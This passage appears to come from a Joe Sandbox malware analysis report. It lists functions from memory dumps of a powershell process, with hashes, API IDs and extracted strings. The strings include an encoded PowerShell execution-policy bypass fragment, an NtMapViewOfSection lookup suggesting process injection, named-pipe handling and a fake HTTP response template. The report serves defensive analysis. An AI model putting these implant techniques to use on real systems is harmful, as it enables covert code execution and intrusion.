                                                    • API String ID: 1547050394-0
                                                    • Opcode ID: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
                                                    • Instruction ID: f2e4704a8edb9798360390409e48aa3e50d3e0926f408b76b990848836170ce6
                                                    • Opcode Fuzzy Hash: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
                                                    • Instruction Fuzzy Hash: DC21D863714782A1FF515FA1BA0935E62A4AB4C7C0F464821AD4E8FFAADF7CC4406704
                                                    Function 0000022EF9B39B3C Relevance: 9.1, APIs: 6, Instructions: 63COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$__doserrno__lock_fhandle_getptd_noexit
                                                    • String ID:
                                                    • API String ID: 2102446242-0
                                                    • Opcode ID: acc1e709539f3a0e8ebe9ec8259c6fe6fa9b3b7ac075e700e957115c0bfbe106
                                                    • Instruction ID: c93f522df687a020e6854ab51086951096af18fa49508aec0d6be43b35aefdfd
                                                    • Opcode Fuzzy Hash: acc1e709539f3a0e8ebe9ec8259c6fe6fa9b3b7ac075e700e957115c0bfbe106
                                                    • Instruction Fuzzy Hash: 3021F321700642E1FF31EFE99ABDBAC765497A0760F0B4128DBD607BD2DA78C841A31C
                                                    Function 0000022EFA0BFC64 Relevance: 9.1, APIs: 6, Instructions: 58fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$ErrorHeapLastfree$AllocFree_callnewhfclosefwritemalloc
                                                    • String ID:
                                                    • API String ID: 1616846154-0
                                                    • Opcode ID: 17de93f2489608755237434f8f5e09f648d27c8e17da9d8174f51a1e36afe512
                                                    • Instruction ID: 10b6259351297df9ae3b84852ad3e0d35b12034e8932375be81bbdd2bffc999e
                                                    • Opcode Fuzzy Hash: 17de93f2489608755237434f8f5e09f648d27c8e17da9d8174f51a1e36afe512
                                                    • Instruction Fuzzy Hash: 6511B41170474061ED20EBA2B3583AE5351AB8DBD4F454221BE5E4FFEBEE2CC5059790
                                                    Function 0000022EFA0C4488 Relevance: 9.1, APIs: 6, Instructions: 51pipefileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: NamedPipe$ErrorLast$CreateDisconnectFileHandleStateWait
                                                    • String ID:
                                                    • API String ID: 3798860377-0
                                                    • Opcode ID: 66f56032a1747051bfe9465942bea2b3a251e1270fb13d2c0e90442697245dfd
                                                    • Instruction ID: f9b3ed231ab935b2768e657f43623ee3785030f092b8ea61ce4438a9aa6ba129
                                                    • Opcode Fuzzy Hash: 66f56032a1747051bfe9465942bea2b3a251e1270fb13d2c0e90442697245dfd
                                                    • Instruction Fuzzy Hash: 4811D032604651A2FF208BA1F69C71E32A1F78CBA8F4242159A5A4BFB4CFBDC445A700
                                                    Function 0000022EF9B2E3EC Relevance: 9.0, APIs: 5, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
                                                    • String ID: dpoolWait
                                                    • API String ID: 2026495703-1875951006
                                                    • Opcode ID: 8070209c1cbe6b8a0a820429e4883b75791e823d018c18b7f063917c64386bf6
                                                    • Instruction ID: 27fafdf4fbe3f689a6916732e3535e7a76dbf8c44b82924ac776ace678c2d7aa
                                                    • Opcode Fuzzy Hash: 8070209c1cbe6b8a0a820429e4883b75791e823d018c18b7f063917c64386bf6
                                                    • Instruction Fuzzy Hash: 7401C47170079051EE16DB93B9187596699F7A8FE0F06422DEEA947FC6CF38C0418744
                                                    Function 0000022EFA0CEFEC Relevance: 9.0, APIs: 5, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    • HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 0000022EFA0CF044
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errnomalloc$_callnewh$AllocHeap_invalid_parameter_noinfo_snprintf
                                                    • String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
                                                    • API String ID: 3518644649-2739389480
                                                    • Opcode ID: afba7a99536ed02a45dac5d500ee5d86b7940ec366185a31927e6e9a708e28fc
                                                    • Instruction ID: de8ad4161009a9a66578c2b90eee8c1ca75821893296401fae313cb4118ffb79
                                                    • Opcode Fuzzy Hash: afba7a99536ed02a45dac5d500ee5d86b7940ec366185a31927e6e9a708e28fc
                                                    • Instruction Fuzzy Hash: 2601C032701B9052EE44DB92B9487596799F78CFE0F164229EEA94BFE6DF3CC4418780
                                                    Function 0000022EF9B225F4 Relevance: 8.9, APIs: 7, Instructions: 181stringCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: freemallocstrchr$rand
                                                    • String ID:
                                                    • API String ID: 1305919620-0
                                                    • Opcode ID: f55c98597b31e9256bdda085e271814e8bdd530284bc77f6856305a025606a71
                                                    • Instruction ID: 97e985e95771c4031f342cfc85e0bffceae314a39101b192ced222eaafa0b155
                                                    • Opcode Fuzzy Hash: f55c98597b31e9256bdda085e271814e8bdd530284bc77f6856305a025606a71
                                                    • Instruction Fuzzy Hash: 2F713951608BC461FE3B9B69A5283EAA390EFA5BC4F094114DFC957FA6EE3CC1429704
                                                    Function 0000022EFA0C31F4 Relevance: 8.9, APIs: 7, Instructions: 181stringCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: freemallocstrchr$rand
                                                    • String ID:
                                                    • API String ID: 1305919620-0
                                                    • Opcode ID: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
                                                    • Instruction ID: 02f93262ffad0627e5199d4f47ccbb59b089e5484e2252b3d22d67171e976ef6
                                                    • Opcode Fuzzy Hash: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
                                                    • Instruction Fuzzy Hash: A0712B62614BC061FE269FA9B1093EAA390EF8DBC4F095110DF850BFB6EE2CC1439311
                                                    Function 0000022EF9B13570 Relevance: 8.9, APIs: 7, Instructions: 115COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$_errno$_callnewhmalloc
                                                    • String ID:
                                                    • API String ID: 2761444284-0
                                                    • Opcode ID: 3866d312ddc7406d2c13ac3d10959d9d3de063b9a6b1dce899036bf231b32379
                                                    • Instruction ID: 29ca55ed767d09f3a575d81c00ab8f8361ab65be5445805038fd30de42f8fbab
                                                    • Opcode Fuzzy Hash: 3866d312ddc7406d2c13ac3d10959d9d3de063b9a6b1dce899036bf231b32379
                                                    • Instruction Fuzzy Hash: CD41F321304791A7EE3ADFA796783596790F729BC0F460024DE8647F45EF34D462D708
                                                    Function 0000022EFA0B4170 Relevance: 8.9, APIs: 7, Instructions: 115COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$_errno$_callnewhmalloc$AllocHeap
                                                    • String ID:
                                                    • API String ID: 996410232-0
                                                    • Opcode ID: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
                                                    • Instruction ID: b87dae5485c62137a367097813e264857241f63bbd5781ee6c6f407a566d9861
                                                    • Opcode Fuzzy Hash: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
                                                    • Instruction Fuzzy Hash: 0D41E62930078167EE559BE6AB6835A2750B74DBC0F824120DF458FF65EF3CD522E300
                                                    Function 0000022EFA0BF274 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: htonl$freemalloc
                                                    • String ID: zyxwvutsrqponmlk
                                                    • API String ID: 1249573706-3884694604
                                                    • Opcode ID: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
                                                    • Instruction ID: 8233d111adf7a6d6ee80dbb401b54e1ddfc8297fa45477926144948c214994d9
                                                    • Opcode Fuzzy Hash: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
                                                    • Instruction Fuzzy Hash: 2B31E86230078062EF14DAF6B76936966D1978DBC0F064434AE598BFF7EE3CC5069300
                                                    Function 0000022EFA0C3FA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentProcess$AddressErrorHandleLastModuleProc
                                                    • String ID: NtMapViewOfSection$ntdll.dll
                                                    • API String ID: 1006775078-3170647572
                                                    • Opcode ID: 4efd516be26a68cc1ab5fab53fe02ed59a35285f2b4b3cec42098ec83d9277dd
                                                    • Instruction ID: 139b2b0778726e54c3f959749e9e83c245eea79d6125f25cf8876052a20c418a
                                                    • Opcode Fuzzy Hash: 4efd516be26a68cc1ab5fab53fe02ed59a35285f2b4b3cec42098ec83d9277dd
                                                    • Instruction Fuzzy Hash: 9E31AF22701744A6EF10DBA1F59D76A63A0F78CBA4F150329AE690BFE6DF7CC4459700
                                                    Function 0000022EF9B2B630 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70stringCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: strtok$_getptd_time64malloc
                                                    • String ID: eThreadpoolTimer
                                                    • API String ID: 1522986614-2707337283
                                                    • Opcode ID: b02d7519bf37bc4b38ca8186062a8fc85f913fef5048514e0fa6af22142f2d69
                                                    • Instruction ID: a7d6e6c880b89699795adb2a0c8c7abc9ec0ce774170150333f7343b13a78cb7
                                                    • Opcode Fuzzy Hash: b02d7519bf37bc4b38ca8186062a8fc85f913fef5048514e0fa6af22142f2d69
                                                    • Instruction Fuzzy Hash: 5D21D8726007A491EF22DF92A2AC65D77A8F765BD4F174225EF9A43B81CF34C441C784
                                                    Function 0000022EF9B213B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$remove$_callnewh_invalid_parameter_noinfo_snprintfmalloc
                                                    • String ID: uld not open process: %d (%u)
                                                    • API String ID: 2566950902-823969559
                                                    • Opcode ID: fcd4f31b16295b3d981e03ccf995d44eb940f919008a0e94d9d9162e5faefa64
                                                    • Instruction ID: fae91c09c2b1cb6f4b0b1607aa7e57b1680c968e411d745365c43fa528594e5a
                                                    • Opcode Fuzzy Hash: fcd4f31b16295b3d981e03ccf995d44eb940f919008a0e94d9d9162e5faefa64
                                                    • Instruction Fuzzy Hash: 9AF0962160464099EA36DB92BA2539AA354E7A5BC0F594134EFC917F56CE38C4419B48
                                                    Function 0000022EFA0C1FB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$remove$AllocHeap_callnewh_invalid_parameter_noinfo_snprintfmalloc
                                                    • String ID: %s\%s
                                                    • API String ID: 1896346573-4073750446
                                                    • Opcode ID: 6cb8594f6045d264f6437138ccf0bddfe367ceba4f17556bef63a27e1bb3b346
                                                    • Instruction ID: 50edac745a484ea865a35f6e36c3248cf66036776a7d2299f186725808d7416e
                                                    • Opcode Fuzzy Hash: 6cb8594f6045d264f6437138ccf0bddfe367ceba4f17556bef63a27e1bb3b346
                                                    • Instruction Fuzzy Hash: 97F0B426204B41A6FB10AB91BA043AEA360E78CFC0F594121BF881FFB6DE7CC411A744
                                                    Function 0000022EFA0BCA74 Relevance: 7.8, APIs: 6, Instructions: 296COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: malloc$_snprintf$_errno_time64freehtonlstrtok$AllocExitHeapLocalSleepThreadTime_callnewhrealloc
                                                    • String ID:
                                                    • API String ID: 548016584-0
                                                    • Opcode ID: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
                                                    • Instruction ID: dff07ba835178956bb172e3bc1147b4a11cc9f7cc5220783e67f1dd0712bdd58
                                                    • Opcode Fuzzy Hash: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
                                                    • Instruction Fuzzy Hash: D4C1A06130028176FE18EBE1B76D7AA2295AB8D7C0F474124A9558FFF7DE3CC805A710
                                                    Function 0000022EF9B1DA8C Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _snprintf$strchr$_errno_invalid_parameter_noinfo
                                                    • String ID: /'); %s$rshell -nop -exec bypass -EncodedCommand "%s"
                                                    • API String ID: 199363273-1250630670
                                                    • Opcode ID: 6e2045361780fadf1587795c869fcd23f7db7a84374f415de51a140654aa30c6
                                                    • Instruction ID: 9c87b9ad7efa06709228b9888c77b6c38780cc2296845f6d7a71638b5ad9d5a8
                                                    • Opcode Fuzzy Hash: 6e2045361780fadf1587795c869fcd23f7db7a84374f415de51a140654aa30c6
                                                    • Instruction Fuzzy Hash: C671E422700684A6EF30DFA1E6687DA73A1F7A4784F424115EEC917F98DF38C549D708
                                                    Function 0000022EFA0C00F8 Relevance: 7.6, APIs: 5, Instructions: 133COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 59c4576cc3bafda9519a74292b63c923cc8fd4fa7f2b0ae73700a3254d899919
                                                    • Instruction ID: db1c48d5aacc14485c7253ed190bd0d92c9ba46e93644f086ec9748ad2216fc7
                                                    • Opcode Fuzzy Hash: 59c4576cc3bafda9519a74292b63c923cc8fd4fa7f2b0ae73700a3254d899919
                                                    • Instruction Fuzzy Hash: 9851AF62B00A40A6EF10EFA5E6453ED2360F759788F469115EE092BFA6EF3CC545D740
                                                    Function 0000022EF9B2FA2C Relevance: 7.6, APIs: 5, Instructions: 124COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 1640621425-0
                                                    • Opcode ID: f714c1e563aa58d873e3883a1df435710c86d18d380f096712ab5731ea4c4750
                                                    • Instruction ID: a926d28262253404a6a3cfe23d9947dab81c96c59464fad408c10ae7d9d7b6be
                                                    • Opcode Fuzzy Hash: f714c1e563aa58d873e3883a1df435710c86d18d380f096712ab5731ea4c4750
                                                    • Instruction Fuzzy Hash: E6415921300344A6FE3A8EE3577C35EBAA1F765FE1F1A82209ED547FD1D638C441A208
                                                    Function 0000022EFA0D062C Relevance: 7.6, APIs: 5, Instructions: 124COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 1640621425-0
                                                    • Opcode ID: 09bfc7a718d0a166204737d50e50cc52c68c3e2e3a0cecd9edcc1235780d4021
                                                    • Instruction ID: 3897b31d5a6c3fd5340f79dc97e21f473ed93536d140f7387fee15b8e1177fd8
                                                    • Opcode Fuzzy Hash: 09bfc7a718d0a166204737d50e50cc52c68c3e2e3a0cecd9edcc1235780d4021
                                                    • Instruction Fuzzy Hash: 2641E72370074066FE649EA2778835EA691B78CFD4F5A42249E5B4FFF1DE7CC441A608
                                                    Function 0000022EF9B148F0 Relevance: 7.6, APIs: 6, Instructions: 114COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$_errno$_callnewhmalloc
                                                    • String ID:
                                                    • API String ID: 2761444284-0
                                                    • Opcode ID: 326b315c93b4297f8d1cd44fbd3c536e1a3741d65750285d3f659b19031d268f
                                                    • Instruction ID: 28d2455186ae3afc2eee6fc4c190e727d4d8b513e2482b7a1d5a1cad3ecedf30
                                                    • Opcode Fuzzy Hash: 326b315c93b4297f8d1cd44fbd3c536e1a3741d65750285d3f659b19031d268f
                                                    • Instruction Fuzzy Hash: 7741262232038962EE32DFA756687596695F7B5BC8F0B4034DD958BF41EE38C447D308
                                                    Function 0000022EFA0B54F0 Relevance: 7.6, APIs: 6, Instructions: 114COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
